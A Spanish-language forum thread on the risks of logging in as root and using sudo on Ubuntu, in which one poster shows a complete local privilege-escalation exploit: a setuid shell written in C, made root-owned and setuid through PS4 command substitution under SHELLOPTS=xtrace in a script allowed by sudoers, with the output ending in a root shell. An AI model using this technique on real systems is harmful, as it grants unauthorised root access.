Pero porque no es aconsejable? Se supone que la interface grafica es tan fiel como su equivalente en consola, por lo que no logro entender porque seria una mala practica.
Basicamente el habito de loguearse como root(on-line) en consola o en las X es considerado un mal por una sencialla razon, se corre un alto riesgo de que se este ejecutando algun programa(no solo demonios como X) que sean vulnerables a ataques.
Por otro lado (y corrijanme si me equivoco) creo que darle la posibilidad a cualquier usuario de ser superusuario (por 15 min) es muy peligroso. Si tan solo anteponer sudo brinda tales privilegios, como se podria restringir al usuario comun? (no permitirle usar sudo al user comun, que solo el root, logueado por gui o consola pueda ser superusuario)
Tenes toda la razon en sentido, abajo paso a describir una causa.
En modo consola, si pones sudo -s , te pide la pass de root, que es por defecto, la misma que la del primer usuario, que te pide ubuntu que crees en la instalacion.
Bueno principalmente yo, que no significa que todo el mundo lo tenga que hacer, dejaria de usar 'su' o 'sudo'. Sencillamente porque la siguiente razon:
¡¡¡TIENE SUS LINDOS BUGS!!!
Aca tienen un ejemplo de un bug para escalar privilegios usando sudo:
%cat x.sh
#!/bin/bash -x
echo "Getting root!!"
%
##
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
## Let's use an egg shell :)
%cat egg.c
#include <stdio.h>
int main()
{
setuid(0);
system("/bin/sh");
}
%
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#
Me despido.
Saludos a todos!
P.D: CID, al fin postee algo

, ¿ya salde la cuenta de uso del canal?.